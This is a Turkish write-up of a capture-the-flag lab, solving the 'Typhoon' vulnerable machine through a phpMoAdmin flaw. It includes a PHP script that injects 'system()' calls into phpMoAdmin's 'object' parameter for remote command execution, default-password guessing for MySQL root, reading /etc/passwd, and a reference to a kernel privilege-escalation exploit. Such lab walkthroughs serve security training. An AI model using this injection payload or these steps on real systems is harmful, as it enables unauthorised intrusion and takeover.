#typhoon — phpmoadmin ile ilerleme

#typhoon phpmoadmin ile ilerleme
merhabalar ben numan , bu yazıda sizlerle birlikte prismacsi typhoon makinesini çözümlemeye çalışacağız.
makineyi vmware programı ile içeri aktardıktan sonra makinenin ip adresini bulmak için nmap ile tarıyorum.
nmap ile mevcut ip aralığını sorgulayarak bulabiliriz.
nmap 192.168.1.1–50 
hızlı tarama sonucu ;

ilk olarak 80 portundan ip adresine giriş yaptım.

ben genelde bir web sorusu çözerken ilk olarak sayfaya girdiğimde ilk işim kaynağı görüntülemek oluyor onun ardından robots.txt — humans.txt gibi dosyalara bakarım

robots.txt nedir ?

“ Robot engelleme standardı olarak bilinir. giren botların hangi dizinleri indexleyip hangilerini indexlememesi gibi ayarlar verebilirsiniz. genelde botların görmesini istemeyeceği klasör isimleri yazılır örnek admin dizini ( isteğe bağlı bir şeydir, yazıp yazmamak. ) “

akabinde robots.txt baktığımda bir klasör gördüm.

girdiğimde karşılaştığım ekran aşağıdaki gibidir ;

phpMoAdmin isimi bir script mevcutmuş hemen bununla ilgili daha önceden oluşan güvenlik açıkları mevcut mu diye exploit-db.com üzerinde tarama yaptım.

exploit-db.com nedir ?

“ isminden anlaşılacağı üzere exploit — database ; daha önceden bulunmuş ve platforma bildirilmiş exploitlerin listelerini bulabileceğiniz bir site. “

ilgili scripti exploit-db’de aratığımda önceden bildirilmiş rce açığı mevcut.

rce ?

“ Remote Code Execution ( uzaktan kod çalıştırma,yürütme,uygulama ) “

exploiti aldıktan sonra hemen sömürmek için çalıştırdım ve başarılı bir şekilde sonuç aldım.

ilk olarak /etc/passwd okuyup burada kullanıcılar hakkında bilgi edinmek istedim.

burada bash yetkisi olan kullanıcılara baktığımda

typhoon
admin
postfixuser

mevcut.
dizinleri listelerken admin kullanıcısının daha önce sudo işlemini başarılı bir şekilde gerçekleştirdiğini ve .ssh klasörlerinin olduğunu gördüm.
şimdi o klasörlere göz atacağım adminden başlayalım.
admin klasöründe .ssh içinde secr3t isimli bir dosyamız mevcut, sanırım burada ilk flagımızı elde ediyoruz bu işimize yarayabilir belki bir şifre olabilir.

(başka bir çözüm şekli ile elde edilebiliyor )

bunu kayıt ettikten sonra postfixuser kullanıcısına göz attım burada hiçbir şey elde edemedim, şimdi makinemizin adı ile aynı kullanıcı adını taşıyan kullanıcıya göz atalım.

typhoon bir şey elde edemedim.

kök dizine göz atalım bunun için ufak bir betik yazdım reverse shell alamadım şuanlık işimi görecek bir şey.

<!DOCTYPE HTML>
<html lang=”tr”>
<head>
<meta charset=”UTF-8">
<title></title>
</head>
<body>
<?php
 if($_GET[‘exploit’]){
 $exploit = $_GET[‘exploit’];
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL,”http://192.168.1.37/mongoadmin/");
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS,”object=1;system(‘{$exploit}’);exit;”);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 $cikti = curl_exec($ch);
 curl_close ($ch);
 }else {
 $cikti = “”;
 $exploit = “”;
 }
?>
<form action=”” method=”get”>
<input type=”text” name=”exploit” value=”<?php echo $exploit;?>” autofocus /><br><input type=”submit” /><br>
<pre>
<?php echo $cikti; ?>
</pre>
</form>
</body>
</html>

kodladığımız ufak scriptimizi çalıştırıp kök dizine göz attığımızda
tekrardan bir klasör bekliyor bizi normal klasörlerden farklı olduğunu doğrudan adından görebilirsiniz.

ikinci bulduğumuz flag:
test file
<rec0nm4st3r>R3c0n_m4steeeee3er_fl4g</rec0nm4st3r>

bir flag daha elde ettik.
bu sırada diğer servislerden mysql ve mongodb kurulu olduğunu unutmadık ilk baştaki nmap çıktısında görmüştük
mongodb için çalışan phpmoadmin da gördük.
mysql için bakalım öncelikle.
phpmyadmin kurulumu diye bakmak için 192.168.1.37/phpmyadmin
aklıma gelen ilk basit şifreleri denemek istedim
admin,password,123456,root,toor
bunlardan toor şifresi tuttu. mysql root olarak giriş yaptık

veritabanları incelemek için sırasıyla baktım bu sırada gözüme data çarptı

bir flag daha elde ettik.

an0ther_fl4g_br0! bunu elde ettikten sonra aklıma doğrudan mongodb geldi çünkü orada da farklı veritabanları vardı.

mongodb’nin veritabanlarına göz atmadık çünkü exploite odaklandık, geri dönelim oraya veritabanlarına göz atalım.

elde ettiğim bilgiler ile makineye bağlandım başarılı bir şekilde.
kullanıcı adı : typhoon
şifre : 789456123
bu aşamadan sonra makinede root yetkisine yükseltmeyi deneyeceğim
bunun için ilk bakacağım şeylerden biri
sudo yetkisi olup olmadığı, sudo -l
yetkimin olmadığını veya sudo olarak çalıştırabileceğim bir şey yok.
admin daha önce sudo yetkisine erişmiş onu biliyorum ama onu oradadan bir bulgu elde edemediğim için makinenin sürümüne bakıyorum ubuntu 14 olduğunu görüyorum
uname -a bakarak kernel sürümüne bakıyorum sonrasında sürümü exploit-db’de aratarak bir exploit var mı yok mu bakıyorum

uygun exploiti bulduktan sonra derleyip çalıştırmak kalıyor.

artık root yetkisine sahibim.

Typhoon_r00t3r!

root flagımızda burada.
bu yazıda typhoon makinesine ait phpmoadmin scripti üzerinden içeriye girilmiştir, farklı çözümler için aşağıdaki linkleri takip edebilirsiniz.
~ web üzerinden
buraya kadar okuduğunuz için teşekkür ederim sağlıcakla kalınız.

numan türle
member of #şukufe
kaynaklar :
https://www.exploit-db.com/exploits/36251/ — phpmoadmin rce açığı exploiti
https://pastebin.com/vf5kuS42 — hazırladığım ufak betik
https://www.exploit-db.com/exploits/37292/ — ubuntu 14 Local Privilege Escalation